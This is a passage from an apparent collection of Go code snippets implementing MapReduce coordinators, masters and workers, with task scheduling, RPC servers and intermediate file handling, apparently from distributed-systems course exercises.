roomList)\n\t//fmt.Println(len(firstGeneration))\n\t//PrintGeneration(firstGeneration)\n\t// for _, chrom := range firstGeneration {\n\t// \tfor _, gene := range chrom.genes {\n\t// \t\tPrintGene(gene)\n\t// \t}\n\t// }\n\n\tbestFitValue := float64(0)\n\tbestChromId := 0\n\n\tfor _, chrom := range firstGeneration {\n\t\tif chrom.FitnessScore > bestFitValue {\n\t\t\tbestChromId = chrom.Id\n\t\t\tbestFitValue = chrom.FitnessScore\n\t\t}\n\t}\n\n\tprevGeneration = firstGeneration\n\n\tbestChromInPrevGen := GetBestChromFromGen(prevGeneration)\n\twipGen = append(wipGen, bestChromInPrevGen)\n\tfmt.Println(\"------------------------------\")\n\tPrintGeneration(firstGeneration)\n\tfmt.Println(\"bestFitValue in initial generation is \", bestFitValue, \" chrom id is \", bestChromId)\n\n\tm := Master{}\n\n\tgo Monitor()\n\tm.server()\n\treturn &m\n}", "func StartMaster(config *Config, reduceFunc ReduceFunc) error {\n\t// Config variables\n\tmaster := config.Master\n\tinput := config.InputData\n\ttable := config.Table\n\toutput := config.Output\n\tm := config.M\n\tr := config.R\n\n\t// Load the input data\n\tdb, err := sql.Open(\"sqlite3\", input)\n\tif err != nil {\n\t\tlog.Println(err)\n\t\tfailure(\"sql.Open\")\n\t\treturn err\n\t}\n\tdefer db.Close()\n\n\t// Count the work to be done\n\tquery, err := db.Query(fmt.Sprintf(\"select count(*) from %s;\", table))\n\tif err != nil {\n\t\tfailure(\"sql.Query4\")\n\t\tlog.Println(err)\n\t\treturn err\n\t}\n\tdefer query.Close()\n\n\t// Split up the data per m\n\tvar count int\n\tvar chunksize int\n\tquery.Next()\n\tquery.Scan(&count)\n\tchunksize = int(math.Ceil(float64(count)/float64(m)))\n\tvar works []Work\n\tfor i:=0; i<m; i++ {\n\t\tvar work Work\n\t\twork.Type = TYPE_MAP\n\t\twork.Filename = input\n\t\twork.Offset = i * chunksize\n\t\twork.Size = chunksize\n\t\twork.WorkerID = i\n\t\tworks = append(works, work)\n\t}\n\n\t// Set up the RPC server to listen for workers\n\tme := new(Master)\n\tme.Maps = works\n\tme.M = m\n\tme.R = r\n\tme.ReduceCount = 0\n\tme.DoneChan = make(chan int)\n\tme.Table = table\n\tme.Output = output\n\n\trpc.Register(me)\n\trpc.HandleHTTP()\n\n\tgo func() {\n\t\terr := http.ListenAndServe(master, nil)\n\t\tif err != nil {\n\t\t\tfailure(\"http.ListenAndServe\")\n\t\t\tlog.Println(err.Error())\n\t\t\tos.Exit(1)\n\t\t}\n\t}()\n\n\t<-me.DoneChan\n\n\terr = Merge(r, reduceFunc, output)\n\tif err != nil {\n\t\tlog.Println(err)\n\t}\n\n\treturn nil\n}", "func MakeCoordinator(files []string, nReduce int) *Coordinator {\n\tc := Coordinator{}\n\n\t// Fill map tasks\n\tc.mapTasks = make([]mapTask, len(files))\n\tc.availableMapTasks = make(map[int]int)\n\tc.mapDoneTasks = 0\n\n\tfor i, _ := range c.mapTasks {\n\t\tc.mapTasks[i] = mapTask{false, -1, files[i]}\n\t\tc.availableMapTasks[i] = i\n\t}\n\n\t// Fill reduce tasks\n\tc.reduceTasks = make([]reduceTask, nReduce)\n\tc.availableReduceTasks = make(map[int]int)\n\tc.reduceDoneTasks = 0\n\n\tfor i, _ := range c.reduceTasks {\n\t\tc.reduceTasks[i] = reduceTask{false, -1}\n\t\tc.availableReduceTasks[i] = i\n\t}\n\n\tc.server()\n\treturn &c\n}", "func MakeCoordinator(files []string, nReduce int) *Coordinator {\n\tc := Coordinator{}\n\tc.mu = sync.Mutex{}\n\tc.nReduce = nReduce\n\tc.files = files\n\tif nReduce > len(files){\n\t\tc.taskCh = make(chan Task,nReduce)\n\t}else{\n\t\tc.taskCh = make(chan Task,len(c.files))\n\t}\n\tc.initMapTask()\n\tgo c.tickSchedule()\n\tc.server()\n\tDPrintf(\"coordinator init\")\n\treturn &c\n}", "func (m *ParallelMaster) Start() {\n\tatomic.StoreInt32(&m.active, 1)\n\tm.rpcListener = startMasterRPCServer(m)\n\t// Don't remove the code above here.\n\n\tcount := uint(len(m.InputFileNames))\n\tmapbuffer := make(chan TaskArgs, count)\n\treducebuffer := make(chan TaskArgs, m.NumReducers)\n\n\tfor i, task := range m.InputFileNames {\n\t\tmapbuffer <- TaskArgs(&DoMapArgs{ task, uint(i), m.NumReducers })\n\t}\n\n\tfor i := uint(0); i < m.NumReducers; i += 1 {\n\t\treducebuffer <- TaskArgs(&DoReduceArgs{ i, count })\n\t}\n\n\tm.schedule(mapbuffer)\n\tm.schedule(reducebuffer)\n\n\t// Don't remove the code below here.\n\tm.Shutdown()\n\t<-m.done\n}", "func MakeCoordinator(files []string, nReduce int) *Coordinator {\n\tmapTaskNum := len(files)\n\treduceTaskNum := nReduce\n\ttaskNum := mapTaskNum + reduceTaskNum\n\n\tvar mapTaskList []*Task\n\tfor iMap, file := range files {\n\t\tmapTaskList = append(mapTaskList, &Task{\n\t\t\tID: 0, // set later\n\t\t\tType: TaskMap,\n\t\t\tMapTask: &MapTask{\n\t\t\t\tFile: file,\n\t\t\t\tIMap: iMap,\n\t\t\t\tNReduce: reduceTaskNum,\n\t\t\t},\n\t\t\tReduceTask: nil,\n\t\t})\n\t}\n\n\tvar reduceTaskList []*Task\n\tfor iReduce := 0; iReduce < reduceTaskNum; iReduce++ {\n\t\treduceTaskList = append(reduceTaskList, &Task{\n\t\t\tID: 0, // set later\n\t\t\tType: TaskReduce,\n\t\t\tMapTask: nil,\n\t\t\tReduceTask: &ReduceTask{\n\t\t\t\tNMap: mapTaskNum,\n\t\t\t\tIReduce: iReduce,\n\t\t\t},\n\t\t})\n\t}\n\n\ttaskList := mapTaskList\n\ttaskList = append(taskList, reduceTaskList...)\n\tfor i, task := range taskList {\n\t\ttask.ID = i\n\t}\n\n\tc := Coordinator{\n\t\ttaskNum: taskNum,\n\t\tmapTaskNum: mapTaskNum,\n\t\treduceTaskNum: reduceTaskNum,\n\t\ttaskList: taskList,\n\t\ttaskBeginTime: make([]int64, taskNum),\n\t}\n\tc.isDone.Store(false)\n\tc.server()\n\treturn &c\n}", "func (mr *MapReduce) RunMaster() []int {\n\tnumMapJobs := mr.nMap\n\tnumReduceJobs := mr.nReduce\n\tvar w sync.WaitGroup\n\n\tfor mapJob := 0; mapJob < numMapJobs; mapJob++ {\n\t\tavailableWorker := <-mr.registerChannel\n\t\tfmt.Println(\"USING WORKER\", availableWorker, \"for Map Job\")\n\t\tw.Add(1)\n\t\tgo func(worker string, i int) {\n\t\t\tdefer w.Done()\n\t\t\tvar reply DoJobReply\n\t\t\targs := &DoJobArgs{mr.file, Map, i, mr.nReduce}\n\t\t\tok := call(worker, \"Worker.DoJob\", args, &reply)\n\t\t\tif !ok {\n\t\t\t\tfmt.Println(\"Map Job\", i, \"has FAILED\")\n\t\t\t} else {\n\t\t\t\tfmt.Println(\"Map Job\", i, \"is SUCCESS\")\n\t\t\t}\n\t\t\tmr.registerChannel <- worker\n\t\t}(availableWorker, mapJob)\n\t}\n\n\tw.Wait()\n\tfmt.Println(\"DONE WITH ALL MAP JOBS\")\n\n\tfor reduceJob := 0; reduceJob < numReduceJobs; reduceJob++ {\n\t\tavailableWorker := <-mr.registerChannel\n\t\tfmt.Println(\"USING WORKER\", availableWorker, \"for Reduce Job\")\n\t\tw.Add(1)\n\t\tgo func(worker string, i int) {\n\t\t\tdefer w.Done()\n\t\t\tvar reply DoJobReply\n\t\t\targs := &DoJobArgs{mr.file, Reduce, i, mr.nMap}\n\t\t\tok := call(worker, \"Worker.DoJob\", args, &reply)\n\t\t\tif !ok {\n\t\t\t\tfmt.Println(\"Reduce Job\", i, \"has FAILED\")\n\t\t\t} else {\n\t\t\t\tfmt.Println(\"Reduce Job\", i, \"is SUCCESS\")\n\t\t\t}\n\t\t\tmr.registerChannel <- worker\n\t\t}(availableWorker, reduceJob)\n\t}\n\n\tw.Wait()\n\tfmt.Println(\"DONE WITH ALL REDUCE JOBS\")\n\n\treturn mr.KillWorkers()\n}", "func Worker(mapf func(string, string) []KeyValue,\n\treducef func(string, []string) string) {\n\n\t// uncomment to send the Example RPC to the master.\n\t// CallExample()\n\n\t// 1. notify master of worker creation\n\tworkerID, nReduce := WorkerCreation()\n\n\tfor true{\n\t\ttask, files, taskID := RequestWork()\n\n\t\tif task == \"done\"{\n\t\t\tfmt.Printf(\"Worker %v received done signal\", workerID)\n\n\t\t\t// Notify master of shut down completion\n\t\t\tWorkerShutDown(workerID)\n\t\t\treturn\n\t\t}\n\n\t\tif task == \"map\"{\n\t\t\tfmt.Printf(\"Worker %v received map task\\n\", workerID)\n\n\t\t\tfileName := files[0]\n\t\t\t// read file contents\n\t\t\tfile, _:= os.Open(fileName)\n\t\t\tcontents, _ := ioutil.ReadAll(file)\n\t\t\tfile.Close()\n\n\t\t\tkva := mapf(fileName, string(contents))\n\n\t\t\t// Generate 10 intermediate files\n\t\t\toffset := len(kva) / nReduce\n\t\t\tstart := 0\n\t\t\tend := start + offset\n\n\t\t\tintermediateFiles := make([]string, 0)\n\n\t\t\tfor i:=0; i<nReduce; i++{\n\t\t\t\tend = min(end, len(kva))\n\n\t\t\t\tsegment := kva[start:end]\n\t\t\t\tstart += offset\n\t\t\t\tend += offset\n\n\t\t\t\t// Write to intermediate file\n\t\t\t\tfileName := \"mrIntermediate-\" + strconv.Itoa(taskID) + \"-\" + strconv.Itoa(i)\n\t\t\t\tintermediateFiles = append(intermediateFiles, fileName)\n\n\t\t\t\tofile, _ := os.Create(fileName)\n\t\t\t\tfor j:=0; j<len(segment); j++{\n\t\t\t\t\tpair := segment[j]\n\n\t\t\t\t\tfmt.Fprintf(ofile, \"%v %v\\n\", pair.Key, pair.Value)\n\t\t\t\t}\n\t\t\t}\n\n\t\t\tMapDone(intermediateFiles)\n\n\t\t} else if task == \"reduce\"{\n\t\t\t// Create <word, list(pair(word, 1))> hash map\n\t\t\tkv_map := make(map[string]([]string))\n\n\t\t\tfmt.Printf(\"Worker %v reduce task received\\n\", workerID)\n\n\t\t\t// Hash all rows in each intermediate file\n\t\t\tfor i:=0; i<len(files); i++{\n\t\t\t\tfile := files[i]\n\n\t\t\t\t// read file contents\n\t\t\t\tf, _ := os.Open(file)\n\n\t\t\t\tscanner := bufio.NewScanner(f)\n\t\t\t\tfor scanner.Scan() {\n\t\t\t\t\tline := scanner.Text()\n\n\t\t\t\t\twords := strings.Fields(line)\n\t\t\t\t\tkey := words[0]\n\n\t\t\t\t\tkv_map[key] = append(kv_map[key], line)\n\t\t\t\t}\n\n\t\t\t\tf.Close()\n\t\t\t}\n\n\t\t\t// Sort keys in ascending order\n\t\t\tsortedKeys := make([]string, 0)\n\n\t\t\tfor k, _ := range kv_map{\n\t\t\t\tsortedKeys = append(sortedKeys, k)\n\t\t\t}\n\n\t\t\t// Create output file\n\t\t\tfileName := \"mr-out-\" + strconv.Itoa(taskID)\n\t\t\tofile, _ := os.Create(fileName)\n\n\t\t\t// Perform reduce on each sorted key\n\t\t\tfor i:=0; i<len(sortedKeys); i++{\n\t\t\t\tcount := reducef(sortedKeys[i], kv_map[sortedKeys[i]])\n\n\t\t\t\tfmt.Fprintf(ofile, \"%v %v\\n\", sortedKeys[i], count)\n\t\t\t}\n\t\t}\n\t}\n\n}", "func NewParallelMaster(jobName string, inputFileNames []string,\n\tnumReducers uint, mapF MapFunction, reduceF ReduceFunction) *ParallelMaster {\n\treturn &ParallelMaster{\n\t\tJobName: jobName,\n\t\tInputFileNames: inputFileNames,\n\t\tNumReducers: numReducers,\n\t\tMapF: mapF,\n\t\tReduceF: reduceF,\n\t\tactive: 0,\n\t\tfreeWorkers: make(chan string),\n\t\tdone: make(chan bool),\n\t}\n}", "func MakeCoordinator(files []string, nReduce int) *Coordinator {\n\tc := Coordinator{\n\t\tFileNames: files,\n\t\tMapNums: len(files),\n\t\tReduceNums: nReduce,\n\t\tMapFlags: make([]Flag, len(files)),\n\t\tReduceFlags: make([]Flag, nReduce),\n\t\tMapTaskCnts: make([]int, len(files)),\n\t\tReduceTaskCnts: make([]int, nReduce),\n\t\tMapAllDone: false,\n\t\tReduceAllDone: false,\n\t}\n\t// Your code here.\n\tgo c.HandleTimeout()\n\tc.httpServer()\n\treturn &c\n}", "func main() {\n\n //bring up the services\n\tmasterSrvAddr := master.StartMasterSrv(9090) //9090\n\tworkerSrvAddr1 := worker.StartWorkerSrv(9091); //9091 ,9092, 9093\n\tworkerSrvAddr2 := worker.StartWorkerSrv(9092);\n\tworker.StartWorkerCli(masterSrvAddr, []string{workerSrvAddr1,workerSrvAddr2});\n\tmaster.StartMasterCli();\n\n\t//distributed map-reduce flow\n\tmapOutput,err := master.DoOperation([]string{\"/Users/k0c00nc/go/src/MapReduce/res/input.txt\", \"/Users/k0c00nc/go/src/distributedDb\" +\n\t\t\"/res/input1.txt\"},\"Map\")\n\tif err !=nil{\n\t\tfmt.Printf(\"map phase failed with err %s \", err.Error())\n\t}\n\n\tlocalAggregation,err :=master.DoOperation(mapOutput,\"LocalAggregation\")\n\tif err !=nil{\n\t\tfmt.Printf(\"localAggregation phase failed with err %s \", err.Error())\n\t}\n\n\tshuffing,err :=master.DoOperation(localAggregation,\"Shuffing\")\n\tif err !=nil{\n\t\tfmt.Printf(\"shuffing phase failed with err %s \", err.Error())\n\t}\n\n\treduce,err :=master.DoOperation(shuffing,\"Reduce\")\n\tif err !=nil{\n\t\tfmt.Printf(\"reduce phase failed with err %s \", err.Error())\n\t}\n\n fmt.Println(\"MR output are in file\", reduce[0])\n\n}", "func (m *SequentialMaster) Start() {\n\tm.active = true\n\n\tw := *NewWorker(m.JobName, m.MapF, m.ReduceF)\n\n\tfor i, file := range m.InputFileNames {\n\t\tw.DoMap(file, uint(i), m.NumReducers);\n\t}\n\n\tfor i := uint(0); i < m.NumReducers; i++ {\n\t\tw.DoReduce(i, uint(len(m.InputFileNames)))\n\t}\n}", "func Worker(mapf func(string, string) []KeyValue,\n\treducef func(string, []string) string) {\n\n\tfmt.Println(\"make worker\")\n\n\targs := MRArgs{}\n\targs.Phase = registerPhase\n\n\treply := MRReply{}\n\tcall(\"Master.Schedule\", &args, &reply)\n\t//向master注册\n\n\t//fmt.Printf(\"get map task %v\\n\", reply.NTask)\n\n\t// Your worker implementation here.\n\n\t// uncomment to send the Example RPC to the master.\n\t// CallExample()\n\n\t//fmt.Printf(\"get map task %v\\n\", reply.NTask)\n\n\tfor reply.TaskNum != -2 {\n\n\t\t//reply的TaskNum为-1代表此时仍然有任务未完成,但是这些任务还在生存周期内\n\t\t//reply的TaskNum为-2代表此时仍然所有任务都已完成\n\t\t//fmt.Println(\"get map task\")\n\t\tfmt.Printf(\"get map task %v %v\\n\", reply.TaskNum, reply.FileName)\n\n\t\tif reply.TaskNum == -1 {\n\t\t\t//休眠3s再向master询问\n\t\t\ttime.Sleep(time.Duration(3) * time.Second)\n\t\t\tfmt.Printf(\"worker wake up\\n\")\n\t\t\targs = MRArgs{}\n\t\t\targs.Phase = mapPhase\n\t\t\targs.TaskNum = -1\n\n\t\t\treply = MRReply{}\n\t\t\tcall(\"Master.Schedule\", &args, &reply)\n\t\t\tcontinue\n\t\t}\n\n\t\t//这里与mrsequential.go相似,完成map任务,并输出到中间文件中\n\t\tintermediate := []KeyValue{}\n\t\tfilename := reply.FileName\n\t\tfile, err := os.Open(filename)\n\t\tif err != nil {\n\t\t\tlog.Fatalf(\"cannot open %v\", filename)\n\t\t}\n\t\tcontent, err := ioutil.ReadAll(file)\n\t\tif err != nil {\n\t\t\tlog.Fatalf(\"cannot read %v\", filename)\n\t\t}\n\t\tfile.Close()\n\t\tkva := mapf(filename, string(content))\n\t\tintermediate = append(intermediate, kva...)\n\t\tsort.Sort(ByKey(intermediate))\n\n\t\tfilesenc := make([]*json.Encoder, reply.NTask)\n\t\tfiles := make([]*os.File, reply.NTask)\n\n\t\tfor i := 0; i < reply.NTask; i++ {\n\t\t\tfileName := \"mr-\" + strconv.Itoa(reply.TaskNum) + \"-\" + strconv.Itoa(i)\n\t\t\tfout, err := os.Create(fileName)\n\t\t\tif err != nil {\n\t\t\t\tfmt.Println(fileName, err)\n\t\t\t\treturn\n\t\t\t}\n\t\t\tfilesenc[i] = json.NewEncoder(fout)\n\t\t\tfiles[i] = fout\n\t\t}\n\n\t\ti := 0\n\t\tfor i < len(intermediate) {\n\t\t\tj := i\n\t\t\toutput := KeyValue{intermediate[i].Key, intermediate[i].Value}\n\n\t\t\tfor ; j < len(intermediate) && intermediate[j].Key == intermediate[i].Key; j++ {\n\n\t\t\t\terr := filesenc[ihash(intermediate[i].Key)%reply.NTask].Encode(&output)\n\t\t\t\tif err != nil {\n\t\t\t\t\tfmt.Printf(\"%s Encode Failed %v\\n\", intermediate[i].Key, err)\n\t\t\t\t}\n\t\t\t}\n\n\t\t\t// this is the correct format for each line of Reduce output.\n\n\t\t\ti = j\n\t\t}\n\n\t\tfor _, f := range files {\n\t\t\tf.Close()\n\t\t}\n\n\t\targs = MRArgs{}\n\t\targs.Phase = mapPhase\n\t\targs.TaskNum = reply.TaskNum\n\n\t\treply = MRReply{}\n\t\tcall(\"Master.Schedule\", &args, &reply)\n\t}\n\n\targs = MRArgs{}\n\targs.Phase = waitReducePhase\n\n\treply = MRReply{}\n\n\tcall(\"Master.Schedule\", &args, &reply)\n\n\tfor reply.TaskNum != -2 {\n\n\t\t//reply的TaskNum为-1代表此时仍然有任务未完成,但是这些任务还在生存周期内\n\t\t//reply的TaskNum为-2代表此时仍然所有任务都已完成\n\n\t\tif reply.TaskNum == -1 {\n\t\t\ttime.Sleep(time.Duration(1) * time.Second)\n\t\t\targs = MRArgs{}\n\t\t\targs.Phase = reducePhase\n\t\t\targs.TaskNum = -1\n\n\t\t\treply = MRReply{}\n\t\t\tcall(\"Master.Schedule\", &args, &reply)\n\t\t\tcontinue\n\t\t}\n\n\t\tfmt.Printf(\"get reduce task %v\\n\", reply.TaskNum)\n\n\t\tkva := []KeyValue{}\n\t\tfor j := 0; j < reply.NTask; j++ {\n\t\t\tfilename := \"mr-\" + strconv.Itoa(j) + \"-\" + strconv.Itoa(reply.TaskNum)\n\t\t\tfile, err := os.Open(filename)\n\t\t\tif err != nil {\n\t\t\t\tbreak\n\t\t\t}\n\t\t\tdec := json.NewDecoder(file)\n\t\t\tfor {\n\t\t\t\tvar kv KeyValue\n\t\t\t\tif err := dec.Decode(&kv); err != nil {\n\t\t\t\t\tbreak\n\t\t\t\t}\n\t\t\t\tkva = append(kva, kv)\n\t\t\t}\n\t\t\tfile.Close()\n\t\t}\n\n\t\tsort.Sort(ByKey(kva))\n\n\t\toname := \"mr-out-\" + strconv.Itoa(reply.TaskNum)\n\t\tofile, _ := os.Create(oname)\n\n\t\ti := 0\n\n\t\tfmt.Printf(\"reduce taks %v length %v\\n\", reply.TaskNum, len(kva))\n\t\tfor i < len(kva) {\n\t\t\tj := i + 1\n\t\t\tfor j < len(kva) && kva[j].Key == kva[i].Key {\n\t\t\t\tj++\n\t\t\t}\n\t\t\tvalues := []string{}\n\t\t\tfor k := i; k < j; k++ {\n\t\t\t\tvalues = append(values, kva[k].Value)\n\t\t\t}\n\t\t\toutput := reducef(kva[i].Key, values)\n\n\t\t\t// this is the correct format for each line of Reduce output.\n\t\t\tfmt.Fprintf(ofile, \"%v %v\\n\", kva[i].Key, output)\n\n\t\t\ti = j\n\t\t}\n\n\t\targs = MRArgs{}\n\t\targs.Phase = reducePhase\n\t\targs.TaskNum = reply.TaskNum\n\n\t\treply = MRReply{}\n\t\tcall(\"Master.Schedule\", &args, &reply)\n\t}\n\n}", "func (m *Master) initReduceTask() {\n\tm.Phase = Reduce\n\tfor i := 0; i < m.Reducenr; i++ {\n\t\ttask := Task{Type: Reduce, Idx: i}\n\t\tm.Undone[i] = task\n//\t\tlog.Printf(\"initReduceTask type:%d idx:%d\", task.Type, task.Idx)\n\t}\n}", "func MakeCoordinator(files []string, nReduce int) *Coordinator {\n\tc := Coordinator{\n\t\tfiles: files,\n\t\tnReduce: nReduce,\n\t\tjobLock: &sync.Mutex{},\n\t}\n\tc.initMapJob()\n\tc.server()\n\treturn &c\n}", "func CreateMaster() (err error) {\n\tconn := getConnection(\"mflow\")\n\n\tdb, err := sql.Open(\"godror\", conn.User+\"/\"+conn.Password+\"@\"+conn.ConnectionString)\n\tif err != nil {\n\t\tlog.Fatalln(err)\n\t}\n\tdefer db.Close()\n\ttx, err := db.Begin()\n\tif err != nil {\n\t\tlog.Fatalln(err)\n\t}\n\ttx.QueryRow(`select mflow.seq_tasks_master.nextval from dual`).Scan(&global.IDMaster)\n\n\tcommand := fmt.Sprintf(`\n\t\tinsert into mflow.tasks_master(id,start_date,end_date,status)\n\t\tvalues(%v,sysdate,null,'%v')\n\t`, global.IDMaster, startedStatus)\n\t_, err = tx.Exec(command)\n\tif err != nil {\n\t\tlog.Fatalln(err)\n\t}\n\terr = tx.Commit()\n\tif err != nil {\n\t\tlog.Fatalln(err)\n\t}\n\tfor x := range config.Config.Tasks.Tasks {\n\t\tcreateTask(config.Config.Tasks.Tasks[x].ID)\n\t}\n\treturn\n}", "func StartWorker(mapFunc MapFunc, reduceFunc ReduceFunc, master string) error {\n\tos.Mkdir(\"/tmp/squinn\", 1777)\n\ttasks_run := 0\n\tfor {\n\t\tlogf(\"===============================\")\n\t\tlogf(\" Starting new task.\")\n\t\tlogf(\"===============================\")\n\t\t/*\n\t\t * Call master, asking for work\n\t\t */\n\n\t\tvar resp Response\n\t\tvar req Request\n\t\terr := call(master, \"GetWork\", req, &resp)\n\t\tif err != nil {\n\t\t\tfailure(\"GetWork\")\n\t\t\ttasks_run++\n\t\t\tcontinue\n\t\t}\n\t\t/*\n\t\tif resp.Message == WORK_DONE {\n\t\t\tlog.Println(\"GetWork - Finished Working\")\n\t\t\tresp.Type =\n\t\t\tbreak\n\t\t}\n\t\t*/\n\t\t//for resp.Message == WAIT {\n\t\tfor resp.Type == TYPE_WAIT {\n\t\t\ttime.Sleep(1e9)\n\t\t\terr = call(master, \"GetWork\", req, &resp)\n\t\t\tif err != nil {\n\t\t\t\tfailure(\"GetWork\")\n\t\t\t\ttasks_run++\n\t\t\t\tcontinue\n\t\t\t}\n\t\t\t/*\n\t\t\tif resp.Message == WORK_DONE {\n\t\t\t\tlog.Println(\"GetWork - Finished Working\")\n\t\t\t\tbreak\n\t\t\t}\n\t\t\t*/\n\t\t}\n\t\twork := resp.Work\n\t\toutput := resp.Output\n\t\tvar myAddress string\n\n\t\t/*\n\t\t * Do work\n\t\t */\n\t\t// Walks through the assigned sql records\n\t\t// Call the given mapper function\n\t\t// Receive from the output channel in a go routine\n\t\t// Feed them to the reducer through its own sql files\n\t\t// Close the sql files\n\n\t\tif resp.Type == TYPE_MAP {\n\t\t\tlogf(\"MAP ID: %d\", work.WorkerID)\n\t\t\tlog.Printf(\"Range: %d-%d\", work.Offset, work.Offset+work.Size)\n\t\t\tlog.Print(\"Running Map function on input data...\")\n\t\t\t// Load data\n\t\t\tdb, err := sql.Open(\"sqlite3\", work.Filename)\n\t\t\tif err != nil {\n\t\t\t\tlog.Println(err)\n\t\t\t\tfailure(\"sql.Open\")\n\t\t\t\treturn err\n\t\t\t}\n\t\t\tdefer db.Close()\n\n\n\t\t\t// Query\n\t\t\trows, err := db.Query(fmt.Sprintf(\"select key, value from %s limit %d offset %d;\", work.Table, work.Size, work.Offset))\n\t\t\tif err != nil {\n\t\t\t\tlog.Println(err)\n\t\t\t\tfailure(\"sql.Query1\")\n\t\t\t\treturn err\n\t\t\t}\n\t\t\tdefer rows.Close()\n\n\t\t\tfor rows.Next() {\n\t\t\t\tvar key string\n\t\t\t\tvar value string\n\t\t\t\trows.Scan(&key, &value)\n\n\t\t\t\t// TODO: TURN OFF JOURNALING\n\t\t\t\t//out.DB.Exec(\"pragma synchronous = off\");\n\t\t\t\t//out.DB.Exec(\"pragma journal_mode = off\")\n\n\t\t\t\t//TODO: CREATE INDEXES ON EACH DB SO ORDER BY WORKS FASTER\n\n\t\t\t\t// Temp storage\n\t\t\t\t// Each time the map function emits a key/value pair, you should figure out which reduce task that pair will go to.\n\t\t\t\treducer := big.NewInt(0)\n\t\t\t\treducer.Mod(hash(key), big.NewInt(int64(work.R)))\n\t\t\t\t//db_tmp, err := sql.Open(\"sqlite3\", fmt.Sprintf(\"/tmp/map_output/%d/map_out_%d.sql\", work.WorkerID, reducer.Int64())) //TODO: Directories don't work\n\t\t\t\tdb_tmp, err := sql.Open(\"sqlite3\", fmt.Sprintf(\"/tmp/squinn/map_%d_out_%d.sql\", work.WorkerID, reducer.Int64()))\n\t\t\t\tif err != nil {\n\t\t\t\t\tlog.Println(err)\n\t\t\t\t\tfailure(fmt.Sprintf(\"sql.Open - /tmp/map_output/%d/map_out_%d.sql\", work.WorkerID, reducer.Int64()))\n\t\t\t\t\treturn err\n\t\t\t\t}\n\n\n\t\t\t\t// Prepare tmp database\n\t\t\t\tsqls := []string{\n\t\t\t\t\t\"create table if not exists data (key text not null, value text not null)\",\n\t\t\t\t\t\"create index if not exists data_key on data (key asc, value asc);\",\n\t\t\t\t\t\"pragma synchronous = off;\",\n\t\t\t\t\t\"pragma journal_mode = off;\",\n\t\t\t\t}\n\t\t\t\tfor _, sql := range sqls {\n\t\t\t\t\t_, err = db_tmp.Exec(sql)\n\t\t\t\t\tif err != nil {\n\t\t\t\t\t\tfailure(\"sql.Exec3\")\n\t\t\t\t\t\tfmt.Printf(\"%q: %s\\n\", err, sql)\n\t\t\t\t\t\treturn err\n\t\t\t\t\t}\n\t\t\t\t}\n\n\n\t\t\t\t//type MapFunc func(key, value string, output chan<- Pair) error\n\t\t\t\toutChan := make(chan Pair)\n\t\t\t\tgo func() {\n\t\t\t\t\terr = mapFunc(key, value, outChan)\n\t\t\t\t\tif err != nil {\n\t\t\t\t\t\tfailure(\"mapFunc\")\n\t\t\t\t\t\tlog.Println(err)\n\t\t\t\t\t\t//return err\n\t\t\t\t\t}\n\t\t\t\t}()\n\n\n\t\t\t\t// Get the output from the map function's output channel\n\t\t\t\t//var pairs []Pair\n\t\t\t\tpair := <-outChan\n\t\t\t\tfor pair.Key != \"\" {\n\t\t\t\t\tkey, value = pair.Key, pair.Value\n\t\t\t\t\t// Write the data locally\n\t\t\t\t\tsql := fmt.Sprintf(\"insert into data values ('%s', '%s');\", key, value)\n\t\t\t\t\t_, err = db_tmp.Exec(sql)\n\t\t\t\t\tif err != nil {\n\t\t\t\t\t\tfailure(\"sql.Exec4\")\n\t\t\t\t\t\tfmt.Printf(\"map_%d_out_%d.sql\\n\", work.WorkerID, reducer.Int64())\n\t\t\t\t\t\tfmt.Println(key, value)\n\t\t\t\t\t\tlog.Printf(\"%q: %s\\n\", err, sql)\n\t\t\t\t\t\treturn err\n\t\t\t\t\t}\n\t\t\t\t\t//log.Println(key, value)\n\t\t\t\t\tpair = <-outChan\n\t\t\t\t}\n\t\t\t\tdb_tmp.Close()\n\t\t\t}\n\n\t\t\tmyAddress = net.JoinHostPort(GetLocalAddress(), fmt.Sprintf(\"%d\", 4000+work.WorkerID))\n\t\t\t// Serve the files so each reducer can get them\n\t\t\t// /tmp/map_output/%d/tmp_map_out_%d.sql\n\t\t\tgo func(address string) {\n\t\t\t\t// (4000 + work.WorkerID)\n\t\t\t\t//http.Handle(\"/map_out_files/\", http.FileServer(http.Dir(fmt.Sprintf(\"/tmp/map_output/%d\", work.WorkerID)))) //TODO: Directories don't work\n\t\t\t\t//fileServer := http.FileServer(http.Dir(\"/Homework/3410/mapreduce/\"))\n\t\t\t\tfileServer := http.FileServer(http.Dir(\"/tmp/squinn/\"))\n\t\t\t\tlog.Println(\"Listening on \" + address)\n\t\t\t\tlog.Fatal(http.ListenAndServe(address, fileServer))\n\t\t\t}(myAddress)\n\t\t} else if resp.Type == TYPE_REDUCE {\n\t\t\tlogf(\"REDUCE ID: %d\", work.WorkerID)\n\t\t\t//type ReduceFunc func(key string, values <-chan string, output chan<- Pair) error\n\t\t\t// Load each input file one at a time (copied from each map task)\n\t\t\tvar filenames []string\n\t\t\tfor i, mapper := range work.MapAddresses {\n\t\t\t\t//res, err := http.Get(fmt.Sprintf(\"%d:/tmp/map_output/%d/map_out_%d.sql\", 4000+i, i, work.WorkerID)) //TODO: Directories don't work\n\t\t\t\t//map_file := fmt.Sprintf(\"http://localhost:%d/map_%d_out_%d.sql\", 4000+i, i, work.WorkerID)\n\t\t\t\tmap_file := fmt.Sprintf(\"http://%s/map_%d_out_%d.sql\", mapper, i, work.WorkerID)\n\n\t\t\t\tres, err := http.Get(map_file)\n\t\t\t\tif err != nil {\n\t\t\t\t\tfailure(\"http.Get\")\n\t\t\t\t\tlog.Fatal(err)\n\t\t\t\t}\n\n\t\t\t\tfile, err := ioutil.ReadAll(res.Body)\n\t\t\t\tres.Body.Close()\n\t\t\t\tif err != nil {\n\t\t\t\t\tfailure(\"ioutil.ReadAll\")\n\t\t\t\t\tlog.Fatal(err)\n\t\t\t\t}\n\n\t\t\t\tfilename := fmt.Sprintf(\"/tmp/squinn/map_out_%d_mapper_%d.sql\", work.WorkerID, i)\n\t\t\t\tfilenames = append(filenames, filename)\n\n\t\t\t\terr = ioutil.WriteFile(filename, file, 0777)\n\t\t\t\tif err != nil {\n\t\t\t\t\tfailure(\"file.Write\")\n\t\t\t\t\tlog.Fatal(err)\n\t\t\t\t}\n\t\t\t}\n\n\t\t\t// Combine all the rows into a single input file\n\t\t\tsqls := []string{\n\t\t\t\t\"create table if not exists data (key text not null, value text not null)\",\n\t\t\t\t\"create index if not exists data_key on data (key asc, value asc);\",\n\t\t\t\t\"pragma synchronous = off;\",\n\t\t\t\t\"pragma journal_mode = 